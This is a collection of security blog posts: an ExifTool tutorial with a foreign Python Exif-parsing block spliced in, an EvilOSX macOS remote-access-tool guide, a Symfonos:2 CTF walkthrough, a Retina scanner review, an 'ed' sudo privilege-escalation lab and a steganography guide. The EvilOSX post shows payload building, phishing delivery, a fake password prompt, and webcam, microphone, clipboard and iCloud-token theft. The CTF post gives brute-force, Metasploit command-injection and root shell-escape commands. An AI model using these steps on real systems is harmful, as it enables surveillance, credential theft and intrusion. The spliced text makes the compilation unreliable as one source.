
In this article, we’ll look at various methods to read, write and manipulate the metadata recorded in a variety of file types. To do this, we’ll be using a tool known as “ExifTool”. EXIF is an acronym for Exchangeable Image File Format, a standard for embedding metadata in certain file types.

Table of Content
  • Introduction to ExifTool
  • Installation
  • Usage of ExifTool
    • Extract the Common Meta-Data Information
    • Extract the Specific Meta-Data Information
    • Extract GPS Co-ordinates
    • Extract Thumbnail Image
    • Extract metadata using specific keywords
  • ExifTool’s Verbose Mode
  • Writing the Meta-Data Information
  • Removing Meta-Data Information
  • Saving outputs
    • In HTML file
    • In Text File
  • Extracting EXIF data from a Video file
Introduction

ExifTool is developed by Phil Harvey. It is a platform-independent Perl library coupled with a full-featured command-line implementation for reading, writing and manipulating the metadata across a broad range of files, particularly the JPEG images. This metadata may comprise a bunch of information such as the camera make, file type, permissions, file size etc., though it further offers more details about the photograph, like the exposure, the shutter speed and whether the flash fired or not. ExifTool probably gives us the simplest way to extract metadata from files, as it is free and an open-source program.

Installation

Exiftool is quite easy to deploy. It’s just about hitting our Linux terminal and cloning the tool from GitHub.

git clone https://github.com/exiftool/exiftool.git

In addition, we need to install the necessary package for it.

sudo apt-get install libimage-exiftool-perl

So, we’ve installed the tool on our system. Let’s take a closer look at it.

Usage of Exiftool

To extract the entire metadata of a file, we just need to execute the given below command:

exiftool <filename>

From the below image, you can see that we’ve got all the information drawn from our image file, from the very basic to the advanced.

However, if we also want the tag IDs, in hexadecimal, alongside the EXIF tags, we need to run the following command:

exiftool -H <filename>

From the below image, we can see that there is a lot of information stored within these Exif tags.

Extract the Common Meta-Data Information

Now execute the given below command which will provide us with the output of the most common Exif tags of the image file.

exiftool -common <filename.jpg>

Extract the Specific Meta-Data Information

We can list particular metadata fields of our image file by simply naming the tags in the command:

exiftool -tagname -tagname <filename>

From the below image, we get our desired output displayed along with the respective tag names in a list format.

Extract GPS Co-ordinates

The photographs we capture using our smartphones or camera have GPS coordinates embedded as metadata in the image files. To obtain this, we just need to fire the command given below:

exiftool <filename> | grep GPS

Here we got the GPS Position, now just copy and paste this complete coordinate information over Google Maps and we will get the exact location of the camera when the picture was taken.

Extract Thumbnail Image

Thumbnails are compressed preview copies of the original images. They are created so that the originals can be opened more quickly, and they act as placeholders for them. In order to extract these thumbnail images, we just need to execute the following command:

exiftool -ThumbnailImage (filename) > (Output filename)

Here we can see that the thumbnail.jpg file is extracted from the test.jpg image.

Extract metadata using specific keywords

The following command extracts the metadata tags whose names contain a given keyword:

exiftool "-*keyword*" <filename>

From the below picture, we can see that our fired command displays all tags with names containing the word “Image” from the file.

ExifTool’s Verbose Mode

Verbose mode generates extended information, i.e. when we add [-v] to the exiftool command it displays comprehensive data about the process it is performing.

exiftool -v <filename>

Writing the Meta-Data

ExifTool can write most of the EXIF tags that anyone might want to alter, but some tags are protected because they describe the image’s physical characteristics, such as compression, and cannot be changed with ExifTool. Other tags, like the GPS tags and the MakerNotes, can be edited.

To manipulate the exif data we need to execute the following command:

exiftool -Make="HackingArticles" <filename>

Here we can see that the information stored in the “Make” tag has been changed from “OPPO” to “HackingArticles”. While writing the information, ExifTool automatically preserves the original file by adding “_original” to the end of the file name.

Removing Meta-Data Information

We have only extracted or manipulated the EXIF data so far, but what if we want to remove all the metadata from an image file? Just execute the following command and let’s see how this works:

exiftool -all= <filename>

It reports 1 image files updated: the EXIF data of “test.jpg” has been removed. If we attempt to extract the metadata from “test.jpg” again, we now get just the basic file information; the rest has been deleted.
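As an added example (not from the article or from ExifTool itself), here is a small Python reader and stripper for the parts of the JPEG/Exif format that the GPS and removal sections above rely on: it walks the JPEG segments, parses the TIFF IFDs inside the Exif APP1 segment, converts the GPS degree/minute/second rationals into the signed decimal degrees you would paste into a map, and then removes the APP1 and COM segments, which is the segment-level effect `-all=` has on Exif data. The JPEG, the Make string and the coordinates are constructed for the demo; the file is a valid container but not a decodable picture.

```python
import struct

TYPE_SIZE = {1: 1, 2: 1, 3: 2, 4: 4, 5: 8, 7: 1}   # TIFF field types -> byte width
TAG_MAKE, TAG_GPS_IFD = 0x010F, 0x8825
GPS_LAT_REF, GPS_LAT, GPS_LON_REF, GPS_LON = 0x0001, 0x0002, 0x0003, 0x0004

def encode_ifd(entries, ifd_offset):
    """Serialise one little-endian IFD at ifd_offset (relative to the TIFF header).
    entries: (tag, type, count, raw). Values wider than 4 bytes go after the IFD."""
    data_off = ifd_offset + 2 + 12 * len(entries) + 4
    body, data = b"", b""
    for tag, typ, count, raw in entries:
        if len(raw) <= 4:
            field = raw.ljust(4, b"\0")
        else:
            field = struct.pack("<I", data_off + len(data))
            data += raw
        body += struct.pack("<HHI", tag, typ, count) + field
    return struct.pack("<H", len(entries)) + body + b"\0\0\0\0" + data

def build_sample_jpeg():
    """Constructed JPEG container: real segment framing, dummy scan data (not a picture)."""
    rat = lambda *p: b"".join(struct.pack("<II", n, d) for n, d in p)  # RATIONAL list
    gps = encode_ifd([                                  # GPS IFD right after the header
        (GPS_LAT_REF, 2, 2, b"N\0"),
        (GPS_LAT, 5, 3, rat((28, 1), (36, 1), (2530, 100))),   # 28 deg 36' 25.30" N
        (GPS_LON_REF, 2, 2, b"W\0"),
        (GPS_LON, 5, 3, rat((77, 1), (12, 1), (5140, 100))),   # 77 deg 12' 51.40" W
    ], 8)
    ifd0_off = 8 + len(gps)
    ifd0 = encode_ifd([
        (TAG_MAKE, 2, 16, b"HackingArticles\0"),
        (TAG_GPS_IFD, 4, 1, struct.pack("<I", 8)),      # pointer to the GPS IFD
    ], ifd0_off)
    tiff = b"II*\0" + struct.pack("<I", ifd0_off) + gps + ifd0

    def seg(marker, payload):                           # FF xx + big-endian length
        return bytes([0xFF, marker]) + struct.pack(">H", len(payload) + 2) + payload

    return (b"\xff\xd8"                                       # SOI
            + seg(0xE0, b"JFIF\0\x01\x01\0\0\x01\0\x01\0\0")  # APP0 (kept by the stripper)
            + seg(0xE1, b"Exif\0\0" + tiff)                   # APP1 Exif
            + seg(0xFE, b"constructed sample")                # COM
            + seg(0xDA, b"\x01\x01\0\0\x3f\0")                # SOS header
            + b"\x12\x34\x56\xff\xd9")                        # dummy scan data + EOI

def segments(jpeg):
    """Yield (marker, start, end) per header segment before SOS, then (None, ...) for the tail."""
    pos = 2
    while pos + 4 <= len(jpeg) and jpeg[pos] == 0xFF:
        marker = jpeg[pos + 1]
        if marker in (0xDA, 0xD9):                      # SOS / EOI: header part is over
            break
        length = struct.unpack(">H", jpeg[pos + 2:pos + 4])[0]
        yield marker, pos, pos + 2 + length
        pos += 2 + length
    yield None, pos, len(jpeg)

def read_ifd(tiff, offset, e):
    """Return {tag: (type, raw_bytes)} for the IFD at offset; e is '<' or '>'."""
    n, out = struct.unpack(e + "H", tiff[offset:offset + 2])[0], {}
    for i in range(n):
        ent = offset + 2 + 12 * i
        tag, typ, count = struct.unpack(e + "HHI", tiff[ent:ent + 8])
        size = TYPE_SIZE.get(typ, 1) * count
        off = struct.unpack(e + "I", tiff[ent + 8:ent + 12])[0]   # only meaningful if size > 4
        out[tag] = (typ, tiff[ent + 8:ent + 8 + size] if size <= 4 else tiff[off:off + size])
    return out

def dms_to_decimal(raw, ref, e):
    """Three RATIONALs (deg, min, sec) plus the N/S or E/W ref -> signed degrees."""
    d, dd, m, md, s, sd = struct.unpack(e + "6I", raw)
    value = d / dd + m / md / 60 + s / sd / 3600
    return -value if ref in (b"S", b"W") else value

def extract_gps(jpeg):
    """The data behind `exiftool <file> | grep GPS`: {'make', 'lat', 'lon'}, or None
    when the file has no Exif APP1 segment at all."""
    for marker, start, end in segments(jpeg):
        if marker == 0xE1 and jpeg[start + 4:start + 10] == b"Exif\0\0":
            tiff = jpeg[start + 10:end]
            e = "<" if tiff[:2] == b"II" else ">"           # II little / MM big endian
            ifd0 = read_ifd(tiff, struct.unpack(e + "I", tiff[4:8])[0], e)
            make = ifd0[TAG_MAKE][1].rstrip(b"\0").decode() if TAG_MAKE in ifd0 else None
            gps = (read_ifd(tiff, struct.unpack(e + "I", ifd0[TAG_GPS_IFD][1])[0], e)
                   if TAG_GPS_IFD in ifd0 else {})
            lat = dms_to_decimal(gps[GPS_LAT][1], gps[GPS_LAT_REF][1][:1], e) if GPS_LAT in gps else None
            lon = dms_to_decimal(gps[GPS_LON][1], gps[GPS_LON_REF][1][:1], e) if GPS_LON in gps else None
            return {"make": make, "lat": lat, "lon": lon}
    return None

def strip_metadata(jpeg):
    """Drop APP1..APP15 and COM segments (Exif, XMP, IPTC, comments); copy the rest byte for byte."""
    out = b"\xff\xd8"
    for marker, start, end in segments(jpeg):
        if marker is None or not (0xE1 <= marker <= 0xEF or marker == 0xFE):
            out += jpeg[start:end]
    return out
```

Running `extract_gps` on the output of `strip_metadata` returns None, which is the programmatic form of the "only basic information left" check the article makes after `-all=`.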

Saving outputs in Multiple Formats
  1. In HTML file

We will save the ExifTool’s output in an HTML file in order to maintain the records and for better readability. To do this we will use the parameter “-h” along with the exiftool’s command and save the results in a file with .html extension.

exiftool  -h (filename) > (output.html)

Here, we can see the test.html file is generated. We just need to open it in a browser to check our EXIF data output.

  2. In Text File

We can also export our EXIF data to a text file, with output similar to the HTML one. To achieve this, we simply need to execute the following command:

exiftool (filename) > (outputexif.txt)

Further, we can view our output either by opening it in any text editor or by simply running the command:

cat <filename>

Extracting ExifData from a Video file

ExifTool not only extracts metadata from the JPEG file format but can also read and write a variety of file types. To know more, click here.

We will now extract the entire meta-data information from an mp4 video file. To extract this, we will run the basic exiftool’s command i.e.

exiftool <filename.mp4>

Conclusion

This was ExifTool’s complete usability guide as a metadata extractor. It is user-friendly and convenient because of its simple command-line implementation. It has thus become one of the best tools to extract metadata from a variety of file formats.

Author: Chiragh Arora is a passionate Researcher and Technical Writer at Hacking Articles. He is a hacking enthusiast. Contact here

The post ExifTool : A Meta-Data Extractor appeared first on Hacking Articles.

Hacking Articles by Raj Chandel - 15h ago

In this article, we will learn to use the EvilOSX tool, which is a Remote Administration Tool (RAT) for establishing a foothold on macOS/OSX platforms. It can dramatically increase access in a matter of seconds.

Table of Content
  • Introduction
  • Installation
  • Usage in Exploitation
  • Usage in Post-Exploitation
    • System Info
    • Webcam
    • Retrieve iCloud auth tokens
    • Microphone
    • Clipboard
  • Conclusion
Introduction

EvilOSX is an evil RAT (Remote Administration Tool) designed to work on macOS / OSX platforms. It was developed by Marten4n6. Its backbone is the famous Empire Framework project. This project can be modified to be used on a Rubber Ducky. The toolkit is fully packed with features. It was designed around a module system that makes debugging, improvements and the addition of other modules easy. Also, being developed in Python, it is easy to run across different attacking platforms.

Installation

The installation of the EvilOSX RAT on the attacker machine, which in our case is Kali Linux, is pretty simple. To begin with, we visit the EvilOSX GitHub page. After getting the git link, we clone EvilOSX to our attacker machine using the git clone command.

git clone https://github.com/Marten4n6/EvilOSX.git

After cloning EvilOSX, we move into the newly created directory named EvilOSX. The tool has some predefined requirements that must be installed for it to function properly. Being a Python tool, it uses “pip” to install those requirements, which the author provides in the form of a text file:

pip install -r requirements.txt

Usage in Exploitation

Since we have successfully installed all the predefined requirements, it’s time to run this tool and gain control over some macOS devices. To exploit, we need a payload. To create this payload, we use the start.py file with the builder parameter.

python start.py --builder

After running the script, it asked us to enter the following information:

  • the Server host; here we entered our attacker machine IP address (Kali Linux).
  • Next, it asked us for a port; this can be any random port.
  • After this, we are asked for the location of the payload.
  • Next, we have to choose whether we want EvilOSX to work on the Rubber Ducky or not. Enter 0 if not.
  • Furthermore, we are asked to choose the loader; leave it at the default.
  • After that, we are asked to name the payload so as to phish the user.

After all these choices, a launcher is created as shown in the image given below.

Now we can use any method to share this launcher or payload to the victim. In our case, we used a python HTTP server to get this file to the victim system. This file is downloaded on the victim system and then after providing the proper permissions the payload is executed as shown in the image given below.

chmod 777 Launcher-39q1q9.py
./Launcher-39a1a9.py

While we are executing the launcher on the victim, we have to perform some actions on the attacker machine simultaneously. We are going to execute start.py again, but this time in CLI mode. Here we have to specify the port that we used while creating the launcher as the parameter, as shown in the image.

python start.py -cli --port 4545

Post-Exploitation

After running the start.py script in the previous steps simultaneously with the launcher on the victim machine, we have successfully infiltrated the victim macOS system. The terminal turns into a framework console as shown in the image. We can configure a page to be shown on startup. Type in help to show a list of working commands. We can see the list of active bots by using the bots command. To establish a connection to a bot, use the connect command followed by its number, which in this case is 0. To see the list of available modules we use the modules command.

To use a module, just type in “use” followed by the module name. As there are many available modules, we demonstrate a few of them here for reference. You can try them all at your convenience.

System Info

To get a brief summary of the system, we can use the get info module. This gives us the System Version, Model of the MacOS device. We also get the Battery status in case it is a Laptop. We have the name of the Wi-Fi network it is connected to. It also tells us the privileges the current account has as well as the status of the FileVault.

Webcam

Now, we will try to grab a snap from the webcam of the macOS device. To do this we need to use the webcam module. It warns us that a green LED will light up next to the camera.

We have successfully captured a snap from the victim’s webcam as shown in the given image.

Retrieve iCloud auth tokens

We can extract the iCloud authentication tokens, which contain information related to the Apple ID linked to the device. However, this will first show a prompt on the victim system.

After agreeing to continue, a prompt pops up as shown in the image given below. This masquerades as a genuine prompt that deceives the victim into entering the password.

After the victim enters a password, we successfully capture the mail ID linked to the device as well as the access tokens, as shown in the image given below.

Microphone

We can also capture the audio from the victim device using the microphone module. After running the command use microphone, we are asked to enter the time in seconds to record the audio from the microphone of the victim device and also the name of the service that would show up in the verification prompt.  

Here we entered 5 seconds and left the service name blank, which made the RAT use a random string, as shown in the given image. A permission prompt pops up on the victim system asking for permission to access the microphone.

After allowing it, we have the recorded audio in MP3 format saved on our attacker machine in the tmp directory.

Clipboard

We can also sniff the clipboard data from the victim machine. To do this we have to use the clipboard module. This starts the sniffer on the victim machine for the specified time in seconds. After starting the sniffer, any text that the victim copies can be viewed as shown in the image given below.

Conclusion

EvilOSX has a lot of uses, and the attention to detail in automating certain exploits makes it a great dedicated tool for OSX. The ease with which it works and attacks is remarkable: we can launch a phishing attack to escalate privileges or trick a user into letting us deeper into the system. It’s a great tool and amazing to use, given how it handles connecting to Apple devices.

Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester Contact here

The post EvilOSX-RAT for MacOS/OSX appeared first on Hacking Articles.


Today we are going to take another CTF challenge from the series of Symfonos. The credit for making this VM machine goes to “Zayotic” and it is another boot2root challenge where we have to root the server and capture the flag to complete the challenge. You can download this VM here.

Security Level: Intermediate

Penetrating Methodology:
  1. Scanning
  • NMAP
  2. Enumeration
  • Enum4Linux
  3. Exploitation
  • Smbclient
  • Hydra
  • Msfconsole
  4. Privilege Escalation
  • Exploiting Sudo rights
Walkthrough:

Scanning:

Let’s start off with the scanning process. This target VM took the IP address of 192.168.1.102 automatically from our local wifi network.

Then we used Nmap for port enumeration. We found that ports 21, 22, 80, 139 and 445 are open.

nmap -A 192.168.1.102

Enumeration:

As port 80 is open, we tried to open the IP address in our browser but we didn’t find anything useful on the webpage. We also tried dirb and other directory brute-forcing tools but couldn’t find anything.

For further enumeration, we used Enum4Linux tool and found some useful information. We found a shared directory named anonymous.

To confirm our finding we took the help of smbclient with an empty password to list the shared resources of the target machine and got the same result.

Inside the anonymous directory, there is another directory named backups. Inside the backups directory, we got a log.txt file. So we downloaded the same file with get command.

smbclient -L 192.168.1.102
smbclient //192.168.1.102/anonymous
ls
cd backups
get log.txt

After opening the log.txt file in our local machine we got a username aeolus.

Exploitation:

So far we have got a username aeolus, so we tried to bruteforce it with hydra and after a long wait we successfully got a password sergiotaemo.

hydra -l aeolus -P /usr/share/wordlists/rockyou.txt 192.168.1.102 ssh

Now we have a username and a password, and we already know that an SSH service is running on the target machine. We tried to log in to the target over SSH using msfconsole and were successfully able to do so.

use auxiliary/scanner/ssh/ssh_login
set rhosts 192.168.1.102
set username aeolus
set password sergiotaemo
exploit

From the ifconfig command, we got a little hint that the target machine is listening on the localhost IP only.

So we used netstat command to check for the IP address and ports the target machine is listening on and found that web service (8080) is allowed for localhost only.

So we used port forwarding to access port 8080 of the target.

netstat
portfwd add -l 1234 -p 8080 -r 127.0.0.1

After that, we were able to access the web service running on port 8080. On the webpage, we found it is running a LibreNMS web application.

We searched for any exploit available for the LibreNMS application in Metasploit and found one command injection exploit available.

Using this exploit we were able to get a meterpreter session of the user LibreNMS.

use exploit/linux/http/librenms_addhost_cmd_inject
set rhosts 127.0.0.1
set rport 1234
set lhost 192.168.1.103
set username aeolus
set password sergiotaemo
exploit

Privilege Escalation:

To get to the root shell we checked the sudoers permissions for the librenms user and found that this user can run the mysql command with no password. So we leveraged this to our advantage and ran /bin/sh to get the root shell.

Once we got the root shell we traversed to the root directory and opened the proof.txt file to complete the challenge.

sudo -l
sudo mysql -e '\! /bin/sh'
id
cd /root
cat proof.txt

Author: Auqib Wani is a Certified Ethical Hacker, Penetration Tester and a Tech Enthusiast with more than 5 years of experience in the field of Network & Cyber Security. Contact Here

The post Symfonos:2 Vulnhub Walkthrough appeared first on Hacking Articles.


In this article, we will learn how to use Retina, “a vulnerability scanner”, to our best advantage. There are various network vulnerability scanners, but Retina is the industry’s most powerful and effective vulnerability scanner. This network vulnerability scanning tool provides a vulnerability assessment and generates a full, brief network vulnerability report.

Table of content
  • Introduction to Retina
  • Scanning process
  • Working of Retina
  • Network scanning with retina
  • Conclusion
Introduction to Retina

Retina network scanner allows you to scan multiple platforms. It also provides you with automatic fixes and the ability to create your own audits. It works against all the critical vulnerabilities, hence allowing you to secure your network properly. As it updates its database at the beginning of every session, it is pretty reliable. Retina permits you to scan in parallel, using its queuing system to scan up to 256 targets at the same time. You can also execute the majority of scans without administrative rights. It also allows you to perform custom audit scans to enhance your internal security policies. Retina Network Security Scanner is an outstanding solution designed to discover, profile and assess all assets deployed on an organization’s network. With Retina Network Security Scanner, customers can efficiently identify, prioritize and remediate vulnerabilities such as missing patches and configuration weaknesses.

Scanning Process

For a scan to begin, the specific details are given to Retina through its GUI. As soon as the scanner receives the scanning details, it begins the auditing process. An audit scan covers the following:

  • Targeting: builds a scan list from the address group and discovery options
  • Port scanning: finds all the open, closed and filtered ports
  • Detecting OS: identifies the OS on the target system
  • Auditing: assesses the vulnerabilities of each port and its respective service.
Working of Retina

First, Retina retrieves the list of IPs that need to be scanned, then it builds its target list and writes it to the eeye_groups table. The worklist contains the start and stop data for the job. Retina then starts running the scan. As targets are scanned, the completed entries are removed from the queue record; this guarantees that a scan will complete even if Retina is powered down for any reason. At the end of the scan, the scanner writes Completed to the eeye_groups table in the scan results database (RTD). If the client aborts the job, the scanner writes Aborted to that table.

Network scanning with Retina

We have downloaded the Retina Vulnerability Scanner from the official site. After downloading the correct version for our machine, we installed the scanner through the setup; it is a fairly simple setup. After installation, we run the application, which presents three tabs, i.e. “Audit, Remediate and Report”. First, we work in the Audit tab, where we selected “Single-use”, after which we scan an individual target in Target Type. We will use the IP address for the target. In the case of “Multiple-use”, we can use a specific IP range too.

After selecting the Target, we must select the port that we want to scan, we have multiple options like, all ports, Common Ports, Discovery Ports, and others. In our scenario, we have selected “All ports”.

After selecting the ports, it’s time to select the type of audit, which we want to perform on our target machine. This includes many types with an option to modify. We can craft a personalized audit with the help of options provided. We selected “All Audits”. This took more time in performing the scan, but the personalized scan will take less time.

Now, we got the Options. Here, we have a choice to select some additional functionality that we can include in our scan. This includes OS Detection, Reverse DNS, NetBIOS Name, MAC Address and others. We can also provide the number of users that we want to enumerate.

Now, we run the scanner by clicking on the “Scan” button. After hitting the Scan button, the scan starts running and we can see the details of the scan in the Active tab of the Scan Job section. Here we can see that the name of the server is “Metasploitable” and the operating system is “Ubuntu 8.04”. We can also see other details of the scan.

Now we move on to the “Remediate” tab. Here, in the Configuration section, we can see the vulnerabilities that were found and we have the option to sort the vulnerabilities by name, category and other criteria. Also, in the case of multiple devices, we can generate a report sorted by individual IP address.

Next, we move to the “Report” tab. Here we can select more options to refine our report. This includes sections like Scan Summary, Vulnerabilities by Category, Top Vulnerabilities, Top Open Ports etc. Apart from this, we can also select the type of report that we want. In the below image I have chosen an “Executive Report”.

As you can see from the below image, we are given multiple choices for the Report Type, such as: “Summary Report, Vulnerability Export Report, Access Report, Dashboard Report, etc.” This is one of the most vital features that gives Retina an edge in the market of vulnerability scanners.

Here, in our practical, we have chosen the ‘Executive’ report type as it is the one which is most commonly used in the IT industry. You can see in the above image that, the report will cover all the major sections which are scan summary, top vulnerabilities, and open ports and all the important information that is required.

Once the report is generated, you can open it in the browser as shown in the image below. It will record the date and time of the scans and report for you too.

Everything in the report is catalogued for your convenience, and the titles are shown in the index as shown below. It starts by showing all the top vulnerabilities and goes all the way down to the bottom ones.

First in the report is “scan metrics” which gives a brief overview of the scan. This overview will inform you about how many vulnerabilities are exploitable and will also rate the vulnerabilities for you from low to high. It will also show you the time taken by the scan with the exact start and end time.

And further, it will categorise all the vulnerabilities with their basic information just as it’s shown in the image below:

Then it will show you the top 20 vulnerabilities with their name, risk and information along with their count.

Further, it will show you the bottom 20 vulnerabilities with their names and other information.

Then, as catalogued it will go on to showing you the top twenty open ports with their names, port number and service. It also includes count which helps to tell the total no. of ports that are running in the same service.

And then it tells you about the operating system on the target machine, which is quite necessary information as it helps you to formulate an attack or security policy.

Conclusion

Since the launch of the Retina Vulnerability Scanner in 1998, BeyondTrust states that it has sold over 10,000 copies of the scanner. The Retina Vulnerability Scanner has an edge over other scanners as it continuously monitors and improves the scanner along with the enterprise security posture. It is the most sophisticated vulnerability assessment solution on the market; available as a standalone application, a host-based option, or as part of the Retina CS enterprise vulnerability management solution, Retina Network Security Scanner enables you to efficiently identify IT exposures and prioritize remediation enterprise-wide.

Author: Shubham Sharma is a Cybersecurity enthusiast and Researcher in the field of WebApp Penetration testing. Contact here

The post Retina: A Network Scanning Tool appeared first on Hacking Articles.


In this article, we introduce a line-oriented text editor command, “ed”, which is used to create, display, alter and operate on text files. All ed commands operate on whole lines or ranges of lines; e.g., the “d” command deletes lines, the “m” command moves lines, the “t” command copies lines, and so on. We will then see how we can achieve privilege escalation by making use of these capabilities of the “ed” command.

Table of Content
  • Overview to ed
    • Summary to ed
    • Primary Action attained using ed
  • Abusing ed
    • SUDO Lab setups for privilege Escalation
    • Exploiting SUDO
Summary to ed

The ed command in Linux starts the “ed text editor”, a line-based text editor. Its minimal interface makes it less complex for working on text files. It lets the user perform many operations, such as creating, editing, displaying and manipulating files.

Editing is done in two distinct modes: “command” and “input”. In command mode, ed reads commands from the standard input and executes them to manipulate the contents of the editor buffer, whereas when an input command, such as ‘m’ (move), ‘d’ (delete), ‘t’ (copy) or ‘c’ (change), is given, ed enters its input mode.

It is the oldest UNIX editor, developed in 1969, and has been succeeded by the vi and emacs text editors.

Now type its help command to know more about “ed”.

ed --help

Fundamental activities achieved by “ed”: As we know, “ed” performs many operations, so now we will go through its functionality one by one.

Initializing a file with ed: At the initial phase, the terminal will look like the image below when the command is run. By default, the editor creates an empty buffer to write in, similar to the way any other command-line editor works when you invoke it without a file name.

ed

Now we will start to create a text file that contains some text within it. For doing so very first we will press ‘a’ before entering anything to the file and once we accomplished our task of writing we will enter a period (.) to signify this to the editor.

Note: The main thing to remember is to use ‘a’ (initial) and ‘.’ (final) as the ways to enter and exit the insert mode. Now, to save the buffer in a file, use ‘w’ followed by a file name of your choice; this saves the file under that name and also displays the total number of bytes that the file contains. Then type ‘q’ to quit the editor.

ed
a
.
w info.txt
q
cat info.txt

For the confirmation of your created file i.e. whether it has been created or not you can recheck it by using “cat” command.

Edit the file with ed: Now, in case you need to edit the same file again, then it can simply be done by passing the name of the file as an argument to the ed command, and then following the same procedure as discussed above.

Here in the below image, I’m adding one more line to my file “info.txt” which I have created above by following the same process.

ed info.txt

Note: Every time we use any option of ed, we need the ‘a’, ‘.’, ‘w’ and ‘q’ commands.

Change any specific line: Till now we have learnt basic editing using ed, now let’s move ahead to discuss more editing aspects by using ed. For example, if we want to make changes in a specific line then how we can attain that operation using ed.

Here in the below image, it has been shown how we can print any particular line using argument ‘p’ and ‘n’

When we type ‘p’ it gives us the current line at which the control is currently, while on using ‘n’ it gives us the line number as well.

ed info.txt
p

So after typing ‘n’ we simply need to mention that line no. for which we want alteration. By default ‘n’ displays the last line of the file so after that you can type the line no. as per your search.

n
2
5

Once you achieved the line where you want to make a change, then you can enter ‘c’ to change that line by typing the text again. For example, I have changed the 5th line which is the last line of my file, by adding some more detail to it. To recheck my modification I have read my file by using ‘cat’ command and will save the file by following the same process.

c
cat info.txt

Display error message by the use of ed: When you type something which ed can’t understand, it displays a question mark (?) by default. To know more about where you have mistaken ed provides a very helpful option i.e. ‘h’.

ed info.txt
b
h

As from below screenshot it can be clearly understood that when I have used ‘b’ option it gave me (?) which is the symbol of error and while typing ‘h’ ed has displayed the error message as an unknown command for option ‘b’.

Copy and move operations with ed: Apart from all the functions discussed above, ed also gives the option to copy and paste a line to some other location. In this case, we use the ‘t’ command to copy a line and ‘m’ to move a line. You precede ‘t’ with the number of the line you want to copy and append the destination line number. For example, as in the below image, I have copied the 5th line to position 0 and will save the changes.

ed info.txt
5t0
cat info.txt

In above-mentioned command 5 is representing to the line which needs to copy and 0 is representing to the line no. for where it needs to be copied.

Note: One can also use ‘m’ instead of ‘t’ to move the line to another place.

Search operation using ed: Searching for a line by a keyword can be done easily with ed. To do so, first run ed with “-p%”, which sets ‘%’ as the command prompt. Then, to search forward, enter ‘/’ followed by the search keyword. When you press enter, the editor displays the first line (containing the keyword) it encounters. You can run that command again to continue searching.

ed -p% info.txt
%/misconfiguration
%/Linux

In the image below, ed has printed only those lines that contain the search keywords, i.e. misconfiguration and Linux.

Exploiting ed Sudo Rights Lab setups for Privilege Escalation

Now we will start to perform privilege escalation for “ed”. To do so we need to set up our lab with the ed command granted administrative rights. After that, we will check what effect the sudo rights have on the “ed command” and how we can use it further for privilege escalation.

This can be clearly seen in the image below, in which I have created a local user (test) who holds sudo rights as root.

To add the sudo right, open the /etc/sudoers file and add the following line under the user privilege specification.

test All=(root) NOPASSWD: /bin/ed

Exploiting Sudo rights

Now we will start exploiting the ed binary by taking advantage of the sudoers permission. For this, we need a session on the victim's machine that gives us local user access to the target system, through which we can escalate to root.

First we connect to the target machine over ssh; type the following command to log in as the local user.

ssh test@192.168.1.31

Then we check the sudo rights of the “test” user (if any) and find that user “test” can execute the ed command as “root” without a password.

sudo -l

Now, knowing that the test user holds these sudo rights, we can take advantage of them: ed can be used from an empty buffer to call a bash/sh shell, with higher privileges if sudo permits it.

Conclusion: Hence we have successfully exploited “ed” by abusing its functionality after it was granted higher privileges.

Author: Komal Singh is a Cyber Security Researcher and Technical Content Writer; she is an enthusiastic pentester and Security Analyst at Ignite Technologies. Contact Here

The post Linux for Pentester: ed Privilege Escalation appeared first on Hacking Articles.


In this post, we will introduce multiple ways of hiding text, based on audio, image, video and white text. To achieve this we will use a method known as “Steganography”. The term steganography refers to the technique of hiding secret data within an ordinary, non-secret file or message in order to avoid detection. So here we will look at all those methods that help us do the same.

Table of Content

Introduction

Purpose of steganography

Methods of steganography

  • Audio-based steganography
  • Image-based steganography
  • Video-based steganography
  • White text Steganography

Introduction

Steganography is the practice of hiding a file, message, image or video inside another file, such as a message, video or audio file. In general, the hidden message looks like something else: pictures, articles, sometimes a shopping list. While encryption protects only the content of a message, steganography conceals both the existence and the content of a secret message. Steganography covers data concealed in computer files. So, let's understand this better with examples. First, let's understand the purpose of steganography.

Purpose of Steganography

Steganography is effective communication. First, you can encrypt and hide a private file inside a picture or another file type before sending it to somebody else; the likelihood of interception is reduced. If you send an encrypted file to someone, the other person will try to decrypt it in many ways and may possibly succeed. But in this case it will look like a normal image and the other person will have no hint of what lies behind the picture. So it is always a better and safer way of communication for those organisations that want to protect themselves from these kinds of attacks.

So, let’s start and see how it works.

Audio Steganography

First, we will install software named DeepSound, which lets us hide files inside audio files. For installation please visit the link given below

https://deepsound.en.uptodown.com/windows

Conceal Approach: Now open the application, click on “Open carrier files” and select an mp3 file behind which you want to conceal the original file.

Here we have selected an audio file behind which we will hide the data.

After selecting the file, we click on “Add secret files” and choose the file we want to conceal. Here we have opted for a document file.

Here you can add one more security layer, encoding, by setting a password on the file. As you can see, we have given 123 as the password, without which it won't be possible for the other person to open the file.

The file is created successfully.

Now we can share this mp3 file with the other person to continue the hidden communication in the network.

Reveal Approach: The recipient also needs to open this with the same password we gave for encoding.

As the other person enters the password, he will be able to see the concealed content of the file by clicking on extract files, and the doc file is extracted successfully. So, with this tool, we have successfully concealed our doc file behind the mp3 file.

Image Steganography

Let's now hide a text file behind an image file. For this we have installed the next tool, OpenStego.

Conceal Approach: we first select the doc file we want to hide, then add the image file behind which we will conceal it, then choose a password, and the concealed file is created.

Reveal Approach: Now we extract the doc file by adding the image and giving the right password, and the doc file is extracted.

Video Steganography

Now let's see how we can hide anything behind a video file. For this, we will install the tool Our Secret from the link given here.

https://oursecret.soft112.com/

Once it is downloaded successfully, we will try to conceal a doc file behind a video file.

Let’s start.

Hide: First we select the video we want to send. By clicking on “select a carrier file” we choose our video, then the file we want to hide, then give it a password and click on hide, and our new file is created.

Unhide: Now we open this file with the same tool for unhiding and it asks for the password. Once you enter the password, you get the concealed file.

Text Steganography

Now we move on to a different idea of steganography: white space steganography. Here we hide text behind text in a way that no one can judge. For this, we visit a website

www.spammimic.com

Conceal Approach: Here we click on encode, add the text we want to hide and click on encode.

After clicking on encode you will see that a new encoded text is created.

Reveal Approach: To decode this encoded text, we copy the text, paste it in the box given and click on decode.

And finally you get the message that was hidden behind it.

Another Method

Conceal Approach: That's not all! We can also send this message as an Excel file, which is hard for anyone to detect. To use this feature, we click on “encode as a spreadsheet”, enter the text we want to conceal and click on encode.

This generates a new Excel file that conceals our “secret message” behind its records.

When we open this Excel file it looks like a perfectly normal spreadsheet, so no one will get to know the real message behind it.

Reveal: But as we know there is a hidden message behind this, we will decode it. First click on “decode fake spreadsheet”.

